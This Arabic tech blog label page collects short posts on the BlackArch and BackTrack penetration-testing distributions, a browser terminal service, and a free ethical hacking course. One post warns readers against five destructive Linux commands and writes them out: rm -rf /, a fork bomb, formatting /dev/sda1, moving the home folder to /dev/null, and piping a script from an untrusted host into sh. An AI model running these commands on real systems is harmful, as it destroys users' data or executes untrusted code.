إظهار الرسائل ذات التسميات اخبار الهكرز. إظهار كافة الرسائل
إظهار الرسائل ذات التسميات اخبار الهكرز. إظهار كافة الرسائل
blackarch من أخطر التوزيعات في مجال الاختراق بأكثر من 1000 أداة مجربة !
الكثير من عشاق لينكس يعرفون جيدا توزيعة الباكتراك،والتي خضعت لبعض
التغييرات وتمت إعادة تسميتها "كالي لينكس" .وكما تعلمون فإن هذه التوزيعة
بنيت على أساس ديبيان وتركز على توفير أدوات معينة لخبراء الأمن المعلوماتي
.حاليا، هذه التوزيعة هي واحدة من أكثر التوزيعات شهرة لهذا النوع من
المهام، ولكن ليست بأي حال الوحيدة في هذا المجال بل هناك توزيعة أخرى لا
تقل أهمية عنها.
الذين يحبون توزيعات على أساس Arch Linux سوف يكونوا سعداء بالتعرف على توزيعة أخرى التي أخذت تتطور بشكل ملحوظ اسمها blackarch.
blackarch هي توزيعة لينكس مبنية على آرش لينكس والتي تتمتع بأكثر من 1106
أداة من أدوات الاختراق والحماية والتشفير وغيرها . وهي واحد من المستودعات
بهذه الكمية من الأدوات التي ستجدها في نظام لينكس،والفضل يعود أساسا
للمجتمع الذي تتمتع به هذه التوزيعة ،إذ يتم إضافات أدوت جديدة لها في صفحة
خاصة على الموقع الشهير جيثب ، لذلك ليس من المستغرب أنها وصلت إلى هذا
العدد الكبير.
المثير للاهتمام انه يمكنك تثبيت هذه توزيعة من الصفر باستخدام live usb أو
مجرد إضافة مستودع blackarch الىArch ، لتتمتع بجميع الأدوات دون الحاجة
للتثبيت الكامل للتوزيعة. في حالة تثبيت من الصفر سيكون لديك خيار لاختيار
مختلف المنصات الداعمة من قبل هذه التوزيعة بما في ذلك: اوبن بوكس،Awesome
wm، فلكس بوكس أو spetrwm.
إذا كنت تريد إضافة مستودع إلى آرش لينكس تقوم ببساطة باتباع الخطوات وتنفيذ الأوامر التالية كـRoot. (رابط الدليل الرسمي من هنا )
$ wget -q http://blackarch.org/keyring/blackarch-keyring.pkg.tar.xz{,.sig}$ gpg --keyserver hkp://pgp.mit.edu --recv 4345771566D76038C7FEB43863EC0ADBEA87E4E3$ gpg --keyserver-o no-auto-key-retrieve --with-f blackarch-keyring.pkg.tar.xz.sig$ pacman-key --init$ rm blackarch-keyring.pkg.tar.xz.sig$ pacman --noc -U blackarch-keyring.pkg.tar.xz
أضف الأسطر التالية إلى أرشيف /etc/pacman.conf, مع تغيير "mirror_site" إلى اي mirror تريد من هنا
[blackarch]
Server = mirror_site/$repo/os/$arch
رابط الموقع الرسمي، وستجد هناك جميع الخطوات مشروحة هناك .
التوزيعة خفيفة جدا ،وكذلك جميع الأدوات تم اختبارها من طرف الفريق الساهر
على التوزيعة حسب تصريحاتهم .طبعا هي أكثر تعقيدا مقارنة بكالي لينكس ،
ولكنها من أفضل التوزيعات في مجال اختبار الاختراق. تجربة ممتعة .
تعلم وجرب أوامر لينكس من متصفحك مباشرة مع webminal
بامكانك تثبيت توزيعة ضمن بيئة افتراضية، ويكون نظام لينكس جاهزا في غضون دقائق معدودة . لكن ماذا لو كنت تريد فقط تجربة بعض الأكواد في سطر الأوامر ولست بحاجة لكل هذه الشروط ! الحل إذن عزيزي القارئ هو تجربة خدمةwebminal التي تمكنك من تعلم الأوامر الأساسية والعمل على سطر الأوامر أو ما يسمى بالترمينال من متصفحك مباشرة .
واحدة من الأشياء الصعبة في لينكس هو التعامل مع سطر الأوامر بالنسبة للمبتدئين ، فهذه الشاشة السوداء مع مؤشر وامض قد تسبب الرعب للغالبية العظمى من المستخدمين الجدد. ومن أجل التغلب على هذه الاشكالية يجب ان تكون على معرفة بالأوامر الأساسية الخاصة بهذا النظام .
رغم ان لينكس تتطور بشكل ملحوظ في السنوات الأخيرة وأصبحت جل التوزيعات تعتمد على الواجهة البصرية ،لكن رغم ذلك من حين واخر لابد ان تقوم بزيارة سطر الأوامر لتنفيد بعض العمليات في النظام ، لهذا خدمة webminal تقدم لك فرصة تعلم الأوامر الأساسية وتنفيدها مباشرة على متصفحك .
طبعا يمكنك الوصول إلى هذه الخدمة مجانا ومن أي مكان في العالم ، فقط تحتاج
اتصال بالإنترنت ومتصفح متوافق (فايرفوكس وكروم ) وكذلك تحتاج الى التسجيل
في الموقع ولن تستغرق العملية إلا دقائق معدودة ليتم عرض شاشة سطر الأوامر
جاهزة للاستخدام ،بالاضافة لسلسلة من الدروس الأساسية التي يتم عرضها في
القائمة الجانبية .
BackTrack 5 R1 الان متوفر لتحميل
باك تراك هي نسخة لينكس
تعتمد على توزيعة آبونتو تتوفر على مجموعة من الادوات والبرامج التي تساعد
المحترفين في الحماية من القيام بإختبارات إختراق على اهذاف تجريبية،كان
اول ضهور لهاته التوزيعة للعموم في سنة 2007 والتي طالتها مجموعة من
التغيرات والتحسينات إلى حدود الإصدار الاخير والذي تمت إضافة 30 ادات
جديدة 10 تحديث لادوات قديمة في التوزيعة واكثر من 120 خطأ برمجي تم إصلاحه
كذلك تحديث الكارنل الخاص بالتوزيعة إلى 2.6.39.4 يمكنك تحميل النسخة الجديدة من هنا
5 أوامر "قاتلة" على Linux لا يجب عليك استعمالها
اصبح Linux نظاما سريع الانتشار و اصبح العديد من المستخدمين يتسارعون لتعلم كيفية التعامل معه و حيث ان مركز الاوامر (Terminal) الخاص بالنظام هو ابرز مميزاته فانه يلزم الحذر اثناء التعامل مع اوامره.
في موضوع اليوم سنتطرق الى خمسة اوامر وجب عدم تجربتها الا ان كنت مدركا لما تقوم به لانها ستعرض ملفاتك او نظام التشغيل بكامله للضرر.
rm -rf /
هذا الامر يقوم بحذف كل الملفات الممكنة سواء كانت على القرص الصلب او حتى على اي وحدة تخزين خارجية متصلة بالجهاز كما انه لن يظهر لك طلب تاكيد الامر.
:(){ :|: & };:
يسمى بـ Fork Bomb حيث انه عند تطبيق الامر يقوم بنسخ نفسه مرة اخرى ليصبح لديك اثنان , هذان الاثنان ينسخان نفسهما مرة اخرى وهكذا ..الى ان يستهلك موارد الجهاز و يتجمد النظام .
mkfs.ext4 /dev/sda1
تتجلى مهمة هذا الامر في القيام بعملية Format للـ Partition الرئيسي من القرص الصلب .
mv ~ /dev/null
هذه ~ تمثل الـ Home folder و /dev/null في اوساط Unix هو بمثابة ثقب اسود و بالتالي فتنفيذ هذا الامر يقوم بارسال كل ملفات الـ home folder الى 'العدم' اي حذفها نهائيا. كما يمكن ان نعوض ~ باسم اي مجلد اخر و سيكون له نفس المصير.
wget http://some_untrusted_source -O- | sh
هذا الامر سيقوم بتحميل سكربت من المصدر الغير موثوق ويقوم بتشغيله الشيئ الذي غالبا ما يكون ضارا ,لذا يجب عدم تشغيل مثل هذا الامر من مصادر غير موثوقة.
كانت هذه بعض الاوامر التي وجب التحذير من استخدامها عشوائيا و ان كنت من محبي التجربة فانصحك بتجربتها على نظام تشغيل وهمي.
إستفد الآن من دورة مجانية في الإختراق والحماية يبلغ ثمنها 100 دولار
اقدم لك في هذه التدوينة مجموعة دروس بالڤيديو عن الإختراق والحماية يبلغ
ثمنها 100 دولار ، حيث ان مجموع الدروس هو 19 درس يبدأ من مقدمة حول إختبار
الإختراق وصولا إلى فك التشفير .
بالنسبة لطريقة الحصول على الدورة ، فالطريقة بسيطة تعتمد اولا على ولوج
رابط التسجيل في العرض المجاني ، بعد ذلك تدخل عنوان الاميل في خانة work
Email. وتشرع في إملاء جميع البيانات الاخرى المطلوبة منك قبل ان تنقر على
زر Download باللون البرتقالي ، انذاك ستتوصل بإميل على علبة الواردات
يحتوى على رابط الدروس بالمجان .
الدروس باللغة الإنجليزية لدى وجب ان تكون مؤهل لفهم كلام الاستاذ الذي طرح الدورة . حظ موفق للجميع
عرض : Ethical Hacking courses
عرض : Ethical Hacking courses
الاشتراك في:
الرسائل (Atom)
نص تجريبي
تابعنا على الفيسبوك
المشاركات الشائعة
-
Description Application WEB Réalisé avec la technonologie J2EE. Cette application a pour but de faire la gestion des annonce...
-
JAVA est un langage entièrement orienté objet. Tout votre code doit donc être inclus dans ce qu'on appelle des classes (il vous en...
-
Exercices autour des adresses IP, et des préfixes : 1.Classes d'adresses IP 2. Adresses privées 3.Partition d'une adres...
-
ميكروسوفت الشركة العملاقة تقدم عرض خيالي لمجموعة من الدول العربية من بينها مصر، السعودية، لبنان و باكستان، فإذا كنت مقيم بإحدى البلد...
-
Les conditions sont les éléments les plus utilisés dans n'importe quel langage. Il est impossible de faire l'impasse dessus. G...
-
Les arbres rouges et noirs sont une variante des arbres binaires de recherche. Leur intérêt principal est qu'ils sont rela...
-
Lorsque l'on crée un objet, étant donné que c'est toujours la même classe qui est utilisée pour le même type d'objets (si ...
-
Jusqu'à maintenant, tout a été très théorique. Or, la meilleure façon d'apprendre, c'est la pratique. Voici donc quelques ex...
-
Ce mini projet, regroupe plusieurs fonctionnalités de calculatrice normal mais elle ajoute des boutons dégradé et un écran dégradé....
-
Ce support de cours regroupe quelques notions concernant la l’impl´ementation et le d´eveloppement de bases de donn´ees avec le langage...
التسميات
اخبار الهكرز
الربح من الانترنت
المجانيات
انشاء المواقع
برامج مجانية
adfly
Algorithmes
android
ASP.NET
c#
c++
CCNA
coudes sources
css
Delphi
Excel
Facebook
html
html-css
J2EE
java
jquery
MySQL
php
programmation
Projet d’étude
Python
Reseau informatique
Sécurité informatique
SGBD
SQL server
Systeme d'exploitation
vb.net
VBA